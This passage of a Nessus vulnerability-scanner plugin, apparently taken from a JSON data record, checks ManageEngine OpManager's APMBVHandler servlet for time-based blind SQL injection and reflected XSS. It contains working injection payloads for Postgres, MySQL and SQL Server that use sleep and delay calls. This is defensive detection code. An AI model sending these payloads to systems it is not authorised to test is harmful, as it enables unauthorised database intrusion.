script_dependencies(\"manageengine_opmanager_detect.nbin\");\n script_require_keys(\"installed_sw/ManageEngine OpManager\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\n\nappname = \"ManageEngine OpManager\";\n# Stops get_http_port from branching\nget_install_count(app_name:appname, exit_if_zero:TRUE);\n\nport = get_http_port(default:80);\ninstall = get_single_install(app_name:appname,port:port); # Can be launched against unknown version\nversion = install['version'];\nbuild = install['build' ];\nurl = build_url(port:port,qs:install['path']);\nitem = \"/servlet/APMBVHandler\";\npostdat = \"OPERATION_TYPE=Delete&OPM_BVNAME=\"+rand_str(length:3)+\"'%3b\";\nvariance = 4; # Variance allowed in response time\ntimings = make_list(15,20); # Seconds to sleep for test\ncmds = make_list( # To figure out what the db backend is\n \"+SELECT+pg_sleep(%TIMING%)%3b--+\", # Postgres\n \"+SELECT+SLEEP(%TIMING%)%3b--+\", # MySQL\n \"+WAITFOR+DELAY+'00:00:%TIMING%'%3b--+\" # SQL Server\n);\n\nrequests = make_list();\noutput = NULL;\ntiming = 10;\nnopatch = FALSE;\n\n# Only use \"ViewName\" as a sign that the system\n# hasn't been patched for the XSS for unknown\n# versions or versions less than 11.5\nchkpatch = (version == UNKNOWN_VER);\nif(!chkpatch)\n chkpatch = (ver_compare(ver:version,fix:\"11.5\",strict:FALSE) < 0);\n\n# Find out which db backend we're using\nforeach cmd (cmds)\n{\n http_set_read_timeout(timing*3+variance);\n then = unixtime();\n res = http_send_recv3(\n method : \"POST\",\n item : item,\n add_headers : make_array(\"Content-Type\",\"application/x-www-form-urlencoded\"),\n data : postdat+ereg_replace(pattern:\"%TIMING%\",replace:timing,string:cmd),\n port : port,\n exit_on_fail : TRUE\n );\n now = unixtime();\n\n realtime = timing;\n # No patch at all, query runs 3 times, with 'patch' it runs once\n #\n # 2015/04/05 : Version 11.5 has a variation of this patch that \n # reintroduces ViewName but protects it from being used for XSS\n if(\"ViewName\" >< res[2] && chkpatch)\n {\n realtime = timing*3;\n nopatch = TRUE;\n }\n\n # Found back-end\n delta = now-then;\n if(delta >= realtime && delta < realtime+variance)\n {\n postdat += cmd;\n requests = make_list(requests, http_last_sent_request());\n output += res[0]+'(Response was delayed by '+delta+' seconds)\\n';\n break;\n }\n}\n\n# First test failed\nif(empty_or_null(requests))\n audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, url);\n\n# Try 2 more timings to confirm\nforeach timing (timings)\n{\n realtime = timing;\n if(nopatch) realtime = timing*3;\n\n http_set_read_timeout(realtime+variance);\n then = unixtime();\n res = http_send_recv3(\n method : \"POST\",\n item : item,\n add_headers : make_array(\"Content-Type\",\"application/x-www-form-urlencoded\"),\n data : ereg_replace(pattern:\"%TIMING%\",replace:timing,string:postdat),\n port : port,\n exit_on_fail : TRUE\n );\n now = unixtime();\n\n # Test failed\n delta = now-then;\n if(delta < realtime || delta > realtime+variance)\n audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, url);\n\n # Test passed\n requests = make_list(requests, http_last_sent_request());\n output += res[0]+'(Response was delayed by '+delta+' seconds)\\n';\n}\n\nrep_extra = NULL;\nif(nopatch)\n rep_extra = 'Nessus determined that server is completely unpatched. Each injection' + '\\n' +\n 'runs three times per request and the servlet contains the reflected' + '\\n' +\n 'XSS flaw.';\n\n# If we make it here all 3 tests passed\nsecurity_report_v4(\n port : port,\n request : requests,\n output : chomp(output),\n rep_extra : rep_extra,\n severity : SECURITY_HOLE,\n generic : TRUE,\n sqli : TRUE,\n xss : nopatch # XSS Only present if no patch applied\n);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}

ManageEngine OpManager Multiple Vulnerabilities Nov14

Description

Related